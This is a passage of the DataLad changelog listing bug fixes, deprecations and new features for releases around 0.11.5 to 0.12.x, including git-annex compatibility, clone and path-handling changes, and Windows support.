are shown for `--show-keys short`. ([#4354][])\n\n- `datalad <subcommand>` learned to point to the [datalad-container][]\n extension when a subcommand from that extension is given but the\n extension is not installed. ([#4400][]) ([#4174][])\n\n\n# 0.12.5 (Apr 02, 2020) -- a small step for datalad ...\n\nFix some bugs and make the world an even better place.\n\n## Fixes\n\n- Our `log_progress` helper mishandled the initial display and step of\n the progress bar. ([#4326][])\n\n- `AnnexRepo.get_content_annexinfo` is designed to accept `init=None`,\n but passing that led to an error. ([#4330][])\n\n- Update a regular expression to handle an output change in Git\n v2.26.0. ([#4328][])\n\n- We now set `LC_MESSAGES` to 'C' while running git to avoid failures\n when parsing output that is marked for translation. ([#4342][])\n\n- The helper for decoding JSON streams loaded the last line of input\n without decoding it if the line didn't end with a new line, a\n regression introduced in the 0.12.0 release. ([#4361][])\n\n- The clone command failed to git-annex-init a fresh clone whenever\n it considered to add the origin of the origin as a remote. ([#4367][])\n\n\n# 0.12.4 (Mar 19, 2020) -- Windows?!\n\nThe main purpose of this release is to have one on PyPi that has no\nassociated wheel to enable a working installation on Windows ([#4315][]).\n\n## Fixes\n\n- The description of the `log.outputs` config switch did not keep up\n with code changes and incorrectly stated that the output would be\n logged at the DEBUG level; logging actually happens at a lower\n level. ([#4317][])\n\n# 0.12.3 (March 16, 2020) -- .\n\nUpdates for compatibility with the latest git-annex, along with a few\nmiscellaneous fixes\n\n## Major refactoring and deprecations\n\n- All spots that raised a `NoDatasetArgumentFound` exception now raise\n a `NoDatasetFound` exception to better reflect the situation: it is\n the _dataset_ rather than the _argument_ that is not found. For\n compatibility, the latter inherits from the former, but new code\n should prefer the latter. ([#4285][])\n\n## Fixes\n\n- Updates for compatibility with git-annex version 8.20200226. ([#4214][])\n\n- `datalad export-to-figshare` failed to export if the generated title\n was fewer than three characters. It now queries the caller for the\n title and guards against titles that are too short. ([#4140][])\n\n- Authentication was requested multiple times when git-annex launched\n parallel downloads from the `datalad` special remote. ([#4308][])\n\n- At verbose logging levels, DataLad requests that git-annex display\n debugging information too. Work around a bug in git-annex that\n prevented that from happening. ([#4212][])\n\n- The internal command runner looked in the wrong place for some\n configuration variables, including `datalad.log.outputs`, resulting\n in the default value always being used. ([#4194][])\n\n- [publish][] failed when trying to publish to a git-lfs special\n remote for the first time. ([#4200][])\n\n- `AnnexRepo.set_remote_url` is supposed to establish shared SSH\n connections but failed to do so. ([#4262][])\n\n## Enhancements and new features\n\n- The message provided when a command cannot determine what dataset to\n operate on has been improved. ([#4285][])\n\n- The \"aws-s3\" authentication type now allows specifying the host\n through \"aws-s3_host\", which was needed to work around an\n authorization error due to a longstanding upstream bug. ([#4239][])\n\n- The xmp metadata extractor now recognizes \".wav\" files.\n\n\n# 0.12.2 (Jan 28, 2020) -- Smoothen the ride\n\nMostly a bugfix release with various robustifications, but also makes\nthe first step towards versioned dataset installation requests.\n\n## Major refactoring and deprecations\n\n- The minimum required version for GitPython is now 2.1.12. ([#4070][])\n\n## Fixes\n\n- The class for handling configuration values, `ConfigManager`,\n inappropriately considered the current working directory's dataset,\n if any, for both reading and writing when instantiated with\n `dataset=None`. This misbehavior is fairly inaccessible through\n typical use of DataLad. It affects `datalad.cfg`, the top-level\n configuration instance that should not consider repository-specific\n values. It also affects Python users that call `Dataset` with a\n path that does not yet exist and persists until that dataset is\n created. ([#4078][])\n\n- [update][] saved the dataset when called with `--merge`, which is\n unnecessary and risks committing unrelated changes. ([#3996][])\n\n- Confusing and irrelevant information about Python defaults have been\n dropped from the command-line help. ([#4002][])\n\n- The logic for automatically propagating the 'origin' remote when\n cloning a local source didn't properly account for relative paths.\n ([#4045][])\n\n- Various fixes to file name handling and quoting on Windows.\n ([#4049][]) ([#4050][])\n\n- When cloning failed, error lines were not bubbled up to the user in\n some scenarios. ([#4060][])\n\n## Enhancements and new features\n\n- [clone][] (and thus [install][])\n - now propagates the `reckless` mode from the superdataset when\n cloning a dataset into it. ([#4037][])\n - gained support for `ria+<protocol>://` URLs that point to\n [RIA][handbook-scalable-datastore] stores. ([#4022][])\n - learned to read \"@version\" from `ria+` URLs and install that\n version of a dataset ([#4036][]) and to apply URL rewrites\n configured through Git's `url.*.insteadOf` mechanism ([#4064][]).\n - now copies `datalad.get.subdataset-source-candidate-<name>`\n options configured within the superdataset into the subdataset.\n This is particularly useful for RIA data stores. ([#4073][])\n\n- Archives are now (optionally) handled with 7-Zip instead of\n `patool`. 7-Zip will be used by default, but `patool` will be used\n on non-Windows systems if the `datalad.runtime.use-patool` option is\n set or the `7z` executable is not found. ([#4041][])\n\n\n# 0.12.1 (Jan 15, 2020) -- Small bump after big bang\n\nFix some fallout after major release.\n\n## Fixes\n\n- Revert incorrect relative path adjustment to URLs in [clone][]. ([#3538][])\n\n- Various small fixes to internal helpers and test to run on Windows\n ([#2566][]) ([#2534][])\n\n# 0.12.0 (Jan 11, 2020) -- Krakatoa\n\nThis release is the result of more than a year of development that includes\nfixes for a large number of issues, yielding more robust behavior across a\nwider range of use cases, and introduces major changes in API and behavior. It\nis the first release for which extensive user documentation is available in a\ndedicated [DataLad Handbook][handbook]. Python 3 (3.5 and later) is now the\nonly supported Python flavor.\n\n## Major changes 0.12 vs 0.11\n\n- [save][] fully replaces [add][] (which is obsolete now, and will be removed\n in a future release).\n\n- A new Git-annex aware [status][] command enables detailed inspection of dataset\n hierarchies. The previously available [diff][] command has been adjusted to\n match [status][] in argument semantics and behavior.\n\n- The ability to configure dataset procedures prior and after the execution of\n particular commands has been replaced by a flexible \"hook\" mechanism that is able\n to run arbitrary DataLad commands whenever command results are detected that match\n a specification.\n\n- Support of the Windows platform has been improved substantially. While performance\n and feature coverage on Windows still falls behind Unix-like systems, typical data\n consumer use cases, and standard dataset operations, such as [create][] and [save][],\n are now working. Basic support for data provenance capture via [run][] is also\n functional.\n\n- Support for Git-annex direct mode repositories has been removed, following the\n end of support in Git-annex itself.\n\n- The semantics of relative paths in command line arguments have changed. Previously,\n a call `datalad save --dataset /tmp/myds some/relpath` would have been interpreted\n as saving a file at `/tmp/myds/some/relpath` into dataset `/tmp/myds`. This has\n changed to saving `$PWD/some/relpath` into dataset `/tmp/myds`. More generally,\n relative paths are now always treated as relative to the current working directory,\n except for path arguments of [Dataset][] class instance methods of the Python API.\n The resulting partial duplication of path specifications between path and dataset\n arguments is mitigated by the introduction of two special symbols that can be given\n as dataset argument: `^` and `^.`, which identify the topmost superdataset and the\n closest dataset that contains the working directory, respectively.\n\n- The concept of a \"core API\" has been introduced. Commands situated in the module\n `datalad.core` (such as [create][], [save][], [run][], [status][], [diff][])\n receive additional scrutiny regarding API and implementation, and are\n meant to provide longer-term stability. Application developers are encouraged to\n preferentially build on these commands.\n\n## Major refactoring and deprecations since 0.12.0rc6\n\n- [clone][] has been incorporated into the growing core API. The public\n `--alternative-source` parameter has been removed, and a `clone_dataset`\n function with multi-source capabilities is provided instead. The\n `--reckless` parameter can now take literal mode labels instead of just\n being a binary flag, but backwards compatibility is maintained.\n\n- The `get_file_content` method of `GitRepo` was no longer used\n internally or in any known DataLad extensions and has been removed.\n ([#3812][])\n\n- The function `get_dataset_root` has been replaced by\n `rev_get_dataset_root`. `rev_get_dataset_root` remains as a\n compatibility alias and will be removed in a later release. ([#3815][])\n\n- The `add_sibling` module, marked obsolete in v0.6.0, has been\n removed. ([#3871][])\n\n- `mock` is no longer declared as an external dependency because we\n can rely on it being in the standard library now that our minimum\n required Python version is 3.5. ([#3860][])\n\n- [download-url][] now requires that directories be indicated with a\n trailing slash rather than interpreting a path as directory when it\n doesn't exist. This avoids confusion that can result from typos and\n makes it possible to support directory targets that do not exist.\n ([#3854][])\n\n- The `dataset_only` argument of the `ConfigManager` class is\n deprecated. Use `source=\"dataset\"` instead. ([#3907][])\n\n- The `--proc-pre` and `--proc-post` options have been removed, and\n configuration values for `datalad.COMMAND.proc-pre` and\n `datalad.COMMAND.proc-post` are no longer honored. The new result\n hook mechanism provides an alternative for `proc-post`\n procedures. ([#3963][])\n\n## Fixes since 0.12.0rc6\n\n- [publish][] crashed when called with a detached HEAD. It now aborts\n with an informative message. ([#3804][])\n\n- Since 0.12.0rc6 the call to [update][] in [siblings][] resulted in a\n spurious warning. ([#3877][])\n\n- [siblings][] crashed if it encountered an annex repository that was\n marked as dead. ([#3892][])\n\n- The update of [rerun][] in v0.12.0rc3 for the rewritten [diff][]\n command didn't account for a change in the output of `diff`, leading\n to `rerun --report` unintentionally including unchanged files in its\n diff values. ([#3873][])\n\n- In 0.12.0rc5 [download-url][] was updated to follow the new path\n handling logic, but its calls to AnnexRepo weren't properly\n adjusted, resulting in incorrect path handling when the called from\n a dataset subdirectory. ([#3850][])\n\n- [download-url][] called `git annex addurl` in a way that failed to\n register a URL when its header didn't report the content size.\n ([#3911][])\n\n- With Git v2.24.0, saving new subdatasets failed due to a bug in that\n Git release. ([#3904][])\n\n- With DataLad configured to stop on failure (e.g., specifying\n `--on-failure=stop` from the command line), a failing result record\n was not rendered. ([#3863][])\n\n- Installing a subdataset yielded an \"ok\" status in cases where the\n repository was not yet in its final state, making it ineffective for\n a caller to operate on the repository in response to the result.\n ([#3906][])\n\n- The internal helper for converting git-annex's JSON output did not\n relay information from the \"error-messages\" field. ([#3931][])\n\n- [run-procedure][] reported relative paths that were confusingly not\n relative to the current directory in some cases. It now always\n reports absolute paths. ([#3959][])\n\n- [diff][] inappropriately reported files as deleted in some cases\n when `to` was a value other than `None`. ([#3999][])\n\n- An assortment of fixes for Windows compatibility. ([#3971][]) ([#3974][])\n ([#3975][]) ([#3976][]) ([#3979][])\n\n- Subdatasets installed from a source given by relative path will now\n have this relative path used as 'url' in their .gitmodules record,\n instead of an absolute path generated by Git. ([#3538][])\n\n- [clone][] will now correctly interpret '~/...' paths as absolute path\n specifications. ([#3958][])\n\n- [run-procedure][] mistakenly reported a directory as a procedure.\n ([#3793][])\n\n- The cleanup for batched git-annex processes has been improved.\n ([#3794][]) ([#3851][])\n\n- The function for adding a version ID to an AWS S3 URL doesn't\n support URLs with an \"s3://\" scheme and raises a\n `NotImplementedError` exception when it encounters one. The\n function learned to return a URL untouched if an \"s3://\" URL comes\n in with a version ID. ([#3842][])\n\n- A few spots needed to be adjusted for compatibility with git-annex's\n new `--sameas` [feature][gx-sameas], which allows special remotes to\n share a data store. ([#3856][])\n\n- The `swallow_logs` utility failed to capture some log messages due\n to an incompatibility with Python 3.7. ([#3935][])\n\n- [siblings][]\n - crashed if `--inherit` was passed but the parent dataset did not\n have a remote with a matching name. ([#3954][])\n - configured the wrong pushurl and annexurl values in some\n cases. ([#3955][])\n\n## Enhancements and new features since 0.12.0rc6\n\n- By default, datasets cloned from local source paths will now get a\n configured remote for any recursively discoverable 'origin' sibling that\n is also available from a local path in order to maximize automatic file\n availability across local annexes. ([#3926][])\n\n- The new [result hooks mechanism][hooks] allows callers to specify,\n via local Git configuration values, DataLad command calls that will\n be triggered in response to matching result records (i.e., what you\n see when you call a command with `-f json_pp`). ([#3903][])\n\n- The command interface classes learned to use a new `_examples_`\n attribute to render documentation examples for both the Python and\n command-line API. ([#3821][])\n\n- Candidate URLs for cloning a submodule can now be generated based on\n configured templates that have access to various properties of the\n submodule, including its dataset ID. ([#3828][])\n\n- DataLad's check that the user's Git identity is configured has been\n sped up and now considers the appropriate environment variables as\n well. ([#3807][])\n\n- The `tag` method of `GitRepo` can now tag revisions other than\n `HEAD` and accepts a list of arbitrary `git tag` options.\n ([#3787][])\n\n- When `get` clones a subdataset and the subdataset's HEAD differs\n from the commit that is registered in the parent, the active branch\n of the subdataset is moved to the registered commit if the\n registered commit is an ancestor of the subdataset's HEAD commit.\n This handling has been moved to a more central location within\n `GitRepo`, and now applies to any `update_submodule(..., init=True)`\n call. ([#3831][])\n\n- The output of `datalad -h` has been reformatted to improve\n readability. ([#3862][])\n\n- [unlock][] has been sped up. ([#3880][])\n\n- [run-procedure][] learned to provide and render more information\n about discovered procedures, including whether the procedure is\n overridden by another procedure with the same base name. ([#3960][])\n\n- [save][] now ([#3817][])\n - records the active branch in the superdataset when registering a\n new subdataset.\n - calls `git annex sync` when saving a dataset on an adjusted branch\n so that the changes are brought into the mainline branch.\n\n- [subdatasets][] now aborts when its `dataset` argument points to a\n non-existent dataset. ([#3940][])\n\n- [wtf][] now\n - reports the dataset ID if the current working directory is\n visiting a dataset. ([#3888][])\n - outputs entries deterministically. ([#3927][])\n\n- The `ConfigManager` class\n - learned to exclude ``.datalad/config`` as a source of\n configuration values, restricting the sources to standard Git\n configuration files, when called with `source=\"local\"`.\n ([#3907][])\n - accepts a value of \"override\" for its `where` argument to allow\n Python callers to more convenient override configuration.\n ([#3970][])\n\n- Commands now accept a `dataset` value of \"^.\" as shorthand for \"the\n dataset to which the current directory belongs\". ([#3242][])\n\n# 0.12.0rc6 (Oct 19, 2019) -- some releases are better than the others\n\nbet we will fix some bugs and make a world even a better place.\n\n## Major refactoring and deprecations\n\n- DataLad no longer supports Python 2. The minimum supported version\n of Python is now 3.5. ([#3629][])\n\n- Much of the user-focused content at http://docs.datalad.org has been\n removed in favor of more up to date and complete material available\n in the [DataLad Handbook][handbook]. Going forward, the plan is to\n restrict http://docs.datalad.org to technical documentation geared\n at developers. ([#3678][])\n\n- [update][] used to allow the caller to specify which dataset(s) to\n update as a `PATH` argument or via the the `--dataset` option; now\n only the latter is supported. Path arguments only serve to restrict\n which subdataset are updated when operating recursively.\n ([#3700][])\n\n- Result records from a [get][] call no longer have a \"state\" key.\n ([#3746][])\n\n- [update][] and [get][] no longer support operating on independent\n hierarchies of datasets. ([#3700][]) ([#3746][])\n\n- The [run][] update in 0.12.0rc4 for the new path resolution logic\n broke the handling of inputs and outputs for calls from a\n subdirectory. ([#3747][])\n\n- The `is_submodule_modified` method of `GitRepo` as well as two\n helper functions in gitrepo.py, `kwargs_to_options` and\n `split_remote_branch`, were no longer used internally or in any\n known DataLad extensions and have been removed. ([#3702][])\n ([#3704][])\n\n- The `only_remote` option of `GitRepo.is_with_annex` was not used\n internally or in any known extensions and has been dropped.\n ([#3768][])\n\n- The `get_tags` method of `GitRepo` used to sort tags by committer\n date. It now sorts them by the tagger date for annotated tags and\n the committer date for lightweight tags. ([#3715][])\n\n- The `rev_resolve_path` substituted `resolve_path` helper. ([#3797][])\n\n\n## Fixes\n\n- Correctly handle relative paths in [publish][]. ([#3799][]) ([#3102][])\n\n- Do not erroneously discover directory as a procedure. ([#3793][])\n\n- Correctly extract version from manpage to trigger use of manpages for\n `--help`. ([#3798][])\n\n- The `cfg_yoda` procedure saved all modifications in the repository\n rather than saving only the files it modified. ([#3680][])\n\n- Some spots in the documentation that were supposed appear as two\n hyphens were incorrectly rendered in the HTML output en-dashs.\n ([#3692][])\n\n- [create][], [install][], and [clone][] treated paths as relative to\n the dataset even when the string form was given, violating the new\n path handling rules. ([#3749][]) ([#3777][]) ([#3780][])\n\n- Providing the \"^\" shortcut to `--dataset` didn't work properly when\n called from a subdirectory of a subdataset. ([#3772][])\n\n- We failed to propagate some errors from git-annex when working with\n its JSON output. ([#3751][])\n\n- With the Python API, callers are allowed to pass a string or list of\n strings as the `cfg_proc` argument to [create][], but the string\n form was mishandled. ([#3761][])\n\n- Incorrect command quoting for SSH calls on Windows that rendered\n basic SSH-related functionality (e.g., [sshrun][]) on Windows\n unusable. ([#3688][])\n\n- Annex JSON result handling assumed platform-specific paths on Windows\n instead of the POSIX-style that is happening across all platforms.\n ([#3719][])\n\n- `path_is_under()` was incapable of comparing Windows paths with different\n drive letters. ([#3728][])\n\n## Enhancements and new features\n\n- Provide a collection of \"public\" `call_git*` helpers within GitRepo\n and replace use of \"private\" and less specific `_git_custom_command`\n calls. ([#3791][])\n\n- [status][] gained a `--report-filetype`. Setting it to \"raw\" can\n give a performance boost for the price of no longer distinguishing\n symlinks that point to annexed content from other symlinks.\n ([#3701][])\n\n- [save][] disables file type reporting by [status][] to improve\n performance. ([#3712][])\n\n- [subdatasets][] ([#3743][])\n - now extends its result records with a `contains` field that lists\n which `contains` arguments matched a given subdataset.\n - yields an 'impossible' result record when a `contains` argument\n wasn't matched to any of the reported subdatasets.\n\n- [install][] now shows more readable output when cloning fails.\n ([#3775][])\n\n- `SSHConnection` now displays a more informative error message when\n it cannot start the `ControlMaster` process. ([#3776][])\n\n- If the new configuration option `datalad.log.result-level` is set to\n a single level, all result records will be logged at that level. If\n you've been bothered by DataLad's double reporting of failures,\n consider setting this to \"debug\". ([#3754][])\n\n- Configuration values from `datalad -c OPTION=VALUE ...` are now\n validated to provide better errors. ([#3695][])\n\n- [rerun][] learned how to handle history with merges. As was already\n the case when cherry picking non-run commits, re-creating merges may\n results in conflicts, and `rerun` does not yet provide an interface\n to let the user handle these. ([#2754][])\n\n- The `fsck` method of `AnnexRepo` has been enhanced to expose more\n features of the underlying `git fsck` command. ([#3693][])\n\n- `GitRepo` now has a `for_each_ref_` method that wraps `git\n for-each-ref`, which is used in various spots that used to rely on\n GitPython functionality. ([#3705][])\n\n- Do not pretend to be able to work in optimized (`python -O`) mode,\n crash early with an informative message. ([#3803][])\n\n# 0.12.0rc5 (September 04, 2019) -- .\n\nVarious fixes and enhancements that bring the 0.12.0 release closer.\n\n## Major refactoring and deprecations\n\n- The two modules below have a new home. The old locations still\n exist as compatibility shims and will be removed in a future\n release.\n - `datalad.distribution.subdatasets` has been moved to\n `datalad.local.subdatasets` ([#3429][])\n - `datalad.interface.run` has been moved to `datalad.core.local.run`\n ([#3444][])\n\n- The `lock` method of `AnnexRepo` and the `options` parameter of\n `AnnexRepo.unlock` were unused internally and have been removed.\n ([#3459][])\n\n- The `get_submodules` method of `GitRepo` has been rewritten without\n GitPython. When the new `compat` flag is true (the current\n default), the method returns a value that is compatible with the old\n return value. This backwards-compatible return value and the\n `compat` flag will be removed in a future release. ([#3508][])\n\n- The logic for resolving relative paths given to a command has\n changed ([#3435][]). The new rule is that relative paths are taken\n as relative to the dataset only if a dataset _instance_ is passed by\n the caller. In all other scenarios they're considered relative to\n the current directory.\n\n The main user-visible difference from the command line is that using\n the `--dataset` argument does _not_ result in relative paths being\n taken as relative to the specified dataset. (The undocumented\n distinction between \"rel/path\" and \"./rel/path\" no longer exists.)\n\n All commands under `datalad.core` and `datalad.local`, as well as\n `unlock` and `addurls`, follow the new logic. The goal is for all\n commands to eventually do so.\n\n## Fixes\n\n- The function for loading JSON streams wasn't clever enough to handle\n content that included a Unicode line separator like\n U2028. ([#3524][])\n\n- When [unlock][] was called without an explicit target (i.e., a\n directory or no paths at all), the call failed if any of the files\n did not have content present. ([#3459][])\n\n- `AnnexRepo.get_content_info` failed in the rare case of a key\n without size information. ([#3534][])\n\n- [save][] ignored `--on-failure` in its underlying call to\n [status][]. ([#3470][])\n\n- Calling [remove][] with a subdirectory displayed spurious warnings\n about the subdirectory files not existing. ([#3586][])\n\n- Our processing of `git-annex --json` output mishandled info messages\n from special remotes. ([#3546][])\n\n- [create][]\n - didn't bypass the \"existing subdataset\" check when called with\n `--force` as of 0.12.0rc3 ([#3552][])\n - failed to register the up-to-date revision of a subdataset when\n `--cfg-proc` was used with `--dataset` ([#3591][])\n\n- The base downloader had some error handling that wasn't compatible\n with Python 3. ([#3622][])\n\n- Fixed a number of Unicode py2-compatibility issues. ([#3602][])\n\n- `AnnexRepo.get_content_annexinfo` did not properly chunk file\n arguments to avoid exceeding the command-line character limit.\n ([#3587][])\n\n## Enhancements and new features\n\n- New command `create-sibling-gitlab` provides an interface for\n creating a publication target on a GitLab instance. ([#3447][])\n\n- [subdatasets][] ([#3429][])\n - now supports path-constrained queries in the same manner as\n commands like `save` and `status`\n - gained a `--contains=PATH` option that can be used to restrict the\n output to datasets that include a specific path.\n - now narrows the listed subdatasets to those underneath the current\n directory when called with no arguments\n\n- [status][] learned to accept a plain `--annex` (no value) as\n shorthand for `--annex basic`. ([#3534][])\n\n- The `.dirty` property of `GitRepo` and `AnnexRepo` has been sped up.\n ([#3460][])\n\n- The `get_content_info` method of `GitRepo`, used by `status` and\n commands that depend on `status`, now restricts its git calls to a\n subset of files, if possible, for a performance gain in repositories\n with many files. ([#3508][])\n\n- Extensions that do not provide a command, such as those that provide\n only metadata extractors, are now supported. ([#3531][])\n\n- When calling git-annex with `--json`, we log standard error at the\n debug level rather than the warning level if a non-zero exit is\n expected behavior. ([#3518][])\n\n- [create][] no longer refuses to create a new dataset in the odd\n scenario of an empty .git/ directory upstairs. ([#3475][])\n\n- As of v2.22.0 Git treats a sub-repository on an unborn branch as a\n repository rather than as a directory. Our documentation and tests\n have been updated appropriately. ([#3476][])\n\n- [addurls][] learned to accept a `--cfg-proc` value and pass it to\n its `create` calls. ([#3562][])\n\n# 0.12.0rc4 (May 15, 2019) -- the revolution is over\n\nWith the replacement of the `save` command implementation with `rev-save`\nthe revolution effort is now over, and the set of key commands for\nlocal dataset operations (`create`, `run`, `save`, `status`, `diff`) is\n now complete. This new core API is available from `datalad.core.local`\n(and also via `datalad.api`, as any other command).\n\n## Major refactoring and deprecations\n\n- The `add` command is now deprecated. It will be removed in a future\n release.\n\n## Fixes\n\n- Remove hard-coded dependencies on POSIX path conventions in SSH support\n code ([#3400][])\n\n- Emit an `add` result when adding a new subdataset during [save][] ([#3398][])\n\n- SSH file transfer now actually opens a shared connection, if none exists\n yet ([#3403][])\n\n## Enhancements and new features\n\n- `SSHConnection` now offers methods for file upload and download (`get()`,\n `put()`. The previous `copy()` method only supported upload and was\n discontinued ([#3401][])\n\n\n# 0.12.0rc3 (May 07, 2019) -- the revolution continues\n\nContinues API consolidation and replaces the `create` and `diff` command\nwith more performant implementations.\n\n## Major refactoring and deprecations\n\n- The previous `diff` command has been replaced by the diff variant\n from the [datalad-revolution][] extension. ([#3366][])\n\n- `rev-create` has been renamed to `create`, and the previous `create`\n has been removed. ([#3383][])\n\n- The procedure `setup_yoda_dataset` has been renamed to `cfg_yoda`\n ([#3353][]).\n\n- The `--nosave` of `addurls` now affects only added content, not\n newly created subdatasets ([#3259][]).\n\n- `Dataset.get_subdatasets` (deprecated since v0.9.0) has been\n removed. ([#3336][])\n\n- The `.is_dirty` method of `GitRepo` and `AnnexRepo` has been\n replaced by `.status` or, for a subset of cases, the `.dirty`\n property. ([#3330][])\n\n- `AnnexRepo.get_status` has been replaced by `AnnexRepo.status`.\n ([#3330][])\n\n## Fixes\n\n- [status][]\n - reported on directories that contained only ignored files ([#3238][])\n - gave a confusing failure when called from a subdataset with an\n explicitly specified dataset argument and \".\" as a path ([#3325][])\n - misleadingly claimed that the locally present content size was\n zero when `--annex basic` was specified ([#3378][])\n\n- An informative error wasn't given when a download provider was\n invalid. ([#3258][])\n\n- Calling `rev-save PATH` saved unspecified untracked subdatasets.\n ([#3288][])\n\n- The available choices for command-line options that take values are\n now displayed more consistently in the help output. ([#3326][])\n\n- The new pathlib-based code had various encoding issues on Python 2.\n ([#3332][])\n\n## Enhancements and new features\n\n- [wtf][] now includes information about the Python version. ([#3255][])\n\n- When operating in an annex repository, checking whether git-annex is\n available is now delayed until a call to git-annex is actually\n needed, allowing systems without git-annex to operate on annex\n repositories in a restricted fashion. ([#3274][])\n\n- The `load_stream` on helper now supports auto-detection of\n compressed files. ([#3289][])\n\n- `create` (formerly `rev-create`)\n - learned to be speedier by passing a path to `status` ([#3294][])\n - gained a `--cfg-proc` (or `-c`) convenience option for running\n configuration procedures (or more accurately any procedure that\n begins with \"cfg_\") in the newly created dataset ([#3353][])\n\n- `AnnexRepo.set_metadata` now returns a list while\n `AnnexRepo.set_metadata_` returns a generator, a behavior which is\n consistent with the `add` and `add_` method pair. ([#3298][])\n\n- `AnnexRepo.get_metadata` now supports batch querying of known annex\n files. Note, however, that callers should carefully validate the\n input paths because the batch call will silently hang if given\n non-annex files. ([#3364][])\n\n- [status][]\n - now reports a \"bytesize\" field for files tracked by Git ([#3299][])\n - gained a new option `eval_subdataset_state` that controls how the\n subdataset state is evaluated. Depending on the information you\n need, you can select a less expensive mode to make `status`\n faster. ([#3324][])\n - colors deleted files \"red\" ([#3334][])\n\n- Querying repository content is faster due to batching of `git\n cat-file` calls. ([#3301][])\n\n- The dataset ID of a subdataset is now recorded in the superdataset.\n ([#3304][])\n\n- `GitRepo.diffstatus`\n - now avoids subdataset recursion when the comparison is not with\n the working tree, which substantially improves performance when\n diffing large dataset hierarchies ([#3314][])\n - got smarter and faster about labeling a subdataset as \"modified\"\n ([#3343][])\n\n- `GitRepo.get_content_info` now supports disabling the file type\n evaluation, which gives a performance boost in cases where this\n information isn't needed. ([#3362][])\n\n- The XMP metadata extractor now filters based on file name to improve\n its performance. ([#3329][])\n\n# 0.12.0rc2 (Mar 18, 2019) -- revolution!\n\n## Fixes\n\n- `GitRepo.dirty` does not report on nested empty directories ([#3196][]).\n\n- `GitRepo.save()` reports results on deleted files.\n\n## Enhancements and new features\n\n- Absorb a new set of core commands from the datalad-revolution extension:\n - `rev-status`: like `git status`, but simpler and working with dataset\n hierarchies\n - `rev-save`: a 2-in-1 replacement for save and add\n - `rev-create`: a ~30% faster create\n\n- JSON support tools can now read and write compressed files.\n\n\n# 0.12.0rc1 (Mar 03, 2019) -- to boldly go ...\n\n## Major refactoring and deprecations\n\n- Discontinued support for git-annex direct-mode (also no longer\n supported upstream).\n\n## Enhancements and new features\n\n- Dataset and Repo object instances are now hashable, and can be\n created based on pathlib Path object instances\n\n- Imported various additional methods for the Repo classes to query\n information and save changes.\n\n\n# 0.11.8 (Oct 11, 2019) -- annex-we-are-catching-up\n\n## Fixes\n\n- Our internal command runner failed to capture output in some cases.\n ([#3656][])\n- Workaround in the tests around python in cPython >= 3.7.5 ';' in\n the filename confusing mimetypes ([#3769][]) ([#3770][])\n\n## Enhancements and new features\n\n- Prepared for upstream changes in git-annex, including support for\n the latest git-annex\n - 7.20190912 auto-upgrades v5 repositories to v7. ([#3648][]) ([#3682][])\n - 7.20191009 fixed treatment of (larger/smaller)than in .gitattributes ([#3765][])\n\n- The `cfg_text2git` procedure, as well the `--text-no-annex` option\n of [create][], now configure .gitattributes so that empty files are\n stored in git rather than annex. ([#3667][])\n\n\n# 0.11.7 (Sep 06, 2019) -- python2-we-still-love-you-but-...\n\nPrimarily bugfixes with some optimizations and refactorings.\n\n## Fixes\n\n- [addurls][]\n - now provides better handling when the URL file isn't in the\n expected format. ([#3579][])\n - always considered a relative file for the URL file argument as\n relative to the current working directory, which goes against the\n convention used by other commands of taking relative paths as\n relative to the dataset argument. ([#3582][])\n\n- [run-procedure][]\n - hard coded \"python\" when formatting the command for non-executable\n procedures ending with \".py\". `sys.executable` is now used.\n ([#3624][])\n - failed if arguments needed more complicated quoting than simply\n surrounding the value with double quotes. This has been resolved\n for systems that support `shlex.quote`, but note that on Windows\n values are left unquoted. ([#3626][])\n\n- [siblings][] now displays an informative error message if a local\n path is given to `--url` but `--name` isn't specified. ([#3555][])\n\n- [sshrun][], the command DataLad uses for `GIT_SSH_COMMAND`, didn't\n support all the parameters that Git expects it to. ([#3616][])\n\n- Fixed a number of Unicode py2-compatibility issues. ([#3597][])\n\n- [download-url][] now will create leading directories of the output path\n if they do not exist ([#3646][])\n\n## Enhancements and new features\n\n- The [annotate-paths][] helper now caches subdatasets it has seen to\n avoid unnecessary calls. ([#3570][])\n\n- A repeated configuration query has been dropped from the handling of\n `--proc-pre` and `--proc-post`. ([#3576][])\n\n- Calls to `git annex find` now use `--in=.` instead of the alias\n `--in=here` to take advantage of an optimization that git-annex (as\n of the current release, 7.20190730) applies only to the\n former. ([#3574][])\n\n- [addurls][] now suggests close matches when the URL or file format\n contains an unknown field. ([#3594][])\n\n- Shared logic used in the setup.py files of DataLad and its\n extensions has been moved to modules in the _datalad_build_support/\n directory. ([#3600][])\n\n- Get ready for upcoming git-annex dropping support for direct mode\n ([#3631][])\n\n\n# 0.11.6 (Jul 30, 2019) -- am I the last of 0.11.x?\n\nPrimarily bug fixes to achieve more robust performance\n\n## Fixes\n\n- Our tests needed various adjustments to keep up with upstream\n changes in Travis and Git. ([#3479][]) ([#3492][]) ([#3493][])\n\n- `AnnexRepo.is_special_annex_remote` was too selective in what it\n considered to be a special remote. ([#3499][])\n\n- We now provide information about unexpected output when git-annex is\n called with `--json`. ([#3516][])\n\n- Exception logging in the `__del__` method of `GitRepo` and\n `AnnexRepo` no longer fails if the names it needs are no longer\n bound. ([#3527][])\n\n- [addurls][] botched the construction of subdataset paths that were\n more than two levels deep and failed to create datasets in a\n reliable, breadth-first order. ([#3561][])\n\n- Cloning a `type=git` special remote showed a spurious warning about\n the remote not being enabled. ([#3547][])\n\n## Enhancements and new features\n\n- For calls to git and git-annex, we disable automatic garbage\n collection due to past issues with GitPython's state becoming stale,\n but doing so results in a larger .git/objects/ directory that isn't\n cleaned up until garbage collection is triggered outside of DataLad.\n Tests with the latest GitPython didn't reveal any state issues, so\n we've re-enabled automatic garbage collection. ([#3458][])\n\n- [rerun][] learned an `--explicit` flag, which it relays to its calls\n to [run][[]]. This makes it possible to call `rerun` in a dirty\n working tree ([#3498][]).\n\n- The [metadata][] command aborts earlier if a metadata extractor is\n unavailable. ([#3525][])\n\n# 0.11.5 (May 23, 2019) -- stability is not overrated\n\nShould be faster and less buggy, with a few enhancements.\n\n## Fixes\n\n- [create-sibling][] ([#3318][])\n - Siblings are no longer configured with a post-update hook unless a\n web interface is requested with `--ui`.\n - `git submodule update --init` is no longer called from the\n post-update hook.\n - If `--inherit` is given for a dataset without a superdataset, a\n warning is now given instead of raising an error.\n- The internal command runner failed on Python 2 when its `env`\n argument had unicode values. ([#3332][])\n- The safeguard that prevents creating a dataset in a subdirectory\n that already contains tracked files for another repository failed on\n Git versions before 2.14. For older Git versions, we now warn the\n caller that the safeguard is not active. ([#3347][])\n- A regression introduced in v0.11.1 prevented [save][] from 